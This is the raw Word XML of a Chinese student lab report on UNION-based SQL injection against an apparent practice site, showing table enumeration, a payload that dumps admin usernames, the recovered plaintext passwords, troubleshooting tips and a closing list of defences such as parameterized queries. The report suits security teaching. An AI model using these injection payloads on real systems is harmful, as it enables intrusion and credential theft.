                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0C2AEC">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根据查询结果可知，该admin表的第一个字段为id。仍然通过limit方法遍历admin表字段，并通过修改table_name=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>为其他表名称，易得每个表中的字段数量以及字段名依次为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5238D87C">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admin：id,username,password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB428EB">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dirs：paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3172E07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news：id,content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41005FF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xss：id,user,pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378696FB">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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46C8638F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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获取管理员用户密码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F758E6D">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>通过联合查询可以获取 admin 表中所有用户名，例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375684EE">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 and 0=1 union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="A626A4"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,group_concat(username) from admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7648655B">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C026884">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4092575" cy="2437765"/>
                  <wp:effectExtent l="0" t="0" r="22225" b="63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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4092575" cy="2437765"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D198A2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="20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可以看到管理账户名称依次为：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ppt领取微信</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBB3BF7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"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进一步的，通过将username替换为password可知，上述两个账户的密码分别为hellohack和zkaqbanban：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7171D424">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4144645" cy="2477135"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="1206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17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4144645" cy="2477135"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="426EF7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5" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="098D2D31">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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五、实验过程中遇到的问题及解决情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6EE916">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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问题1：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68407DCA">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>在某些情况下，使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:cs="Times New Roman Bold"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> LIMIT n,m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 查询语句时，返回结果只显示第一个表项，导致无法一次性获取所有目标数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB69BA9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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原因和解决办法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182EFC6C">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>出现该问题的可能原因是目标网站对查询结果的显示长度进行了限制，或页面模板本身只展示第一行数据。为解决该问题，可以采取以下两种方法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D5A28C">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:t>使用 LIMIT n,1 语句逐条遍历表项，直到查询结果为空，借此统计总条数并提取全部信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAEDC18">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:t>使用 GROUP_CONCAT() 函数将多个查询结果合并为一行输出，从而绕过前端显示限制，一次性获取所有目标内容。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D9807C">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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43D79D9A">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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="257BE203">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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="235FA414">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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问题2：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F3A21E5">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>在构造注入语句时，某些 SQL 函数（如 database()、table_name 等）返回结果乱码或页面直接报错，无法识别。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05FC8F9A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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原因和解决办法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6F5B87">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>该问题通常是由于数据库返回的内容未进行适当的编码转换，或前端页面未正确处理非 ASCII 字符所致。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69B2D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0" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59C7638B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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六、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56CF97AD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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（一）实验结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC29495">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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数据库名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D2BC01">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eastAsia"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maoshe。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D86F8CA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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数据库中的所有表的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6E58D5">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eastAsia"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admin，dirs，news，xss。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5177F680">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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每个表中的字段数量以及字段名：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA55AAA">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eastAsia"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admin：id,username,password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C31FB">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eastAsia"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dirs：paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58811FD8">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eastAsia"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news：id,content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4458559D">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eastAsia"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xss：id,user,pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FD1112">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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管理员账户和密码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350BC560">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eastAsia"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(admin, hellohack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7628E236">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eastAsia"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(ppt领取微信, zkaqbanban)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBBAB77">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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26A42F9A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"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（二）分析和总结</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FF3AB6">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>SQL 注入攻击的防范措施包括但不限于以下几种方式：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D53BFA">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2028FC2B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>使用参数化查询或预编译语句：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C035256">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>在编写 SQL 语句时，应避免直接拼接用户输入的变量，而应采用参数化查询或预编译语句，确保用户输入作为纯数据处理，而不会被当作可执行代码。例如，在 Java 中可使用 PreparedStatement 对象，在 Python 的 SQLite 库中可使用问号（?）作为参数占位符，以安全地绑定参数。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FD09B9">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A462B92">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>严格验证和过滤用户输入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A07AB18">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>应对用户输入进行格式、类型、长度等方面的验证，确保仅允许符合预期的数据通过，防止恶意注入内容进入系统。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082E6AD0">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="华文宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A8FE9EB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>采用白名单策略与特殊字符处理：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4074D32A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>建议使用白名单方式，只允许特定的字符集通过验证；同时，对特殊字符（如单引号 '、双引号 "、分号 ; 等）应进行转义、替换或移除，以减少被恶意利用的可能性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB852F0">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2276A903">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>遵循最小权限原则配置数据库账户：</w:t>
            </w:r>
          </w:p>
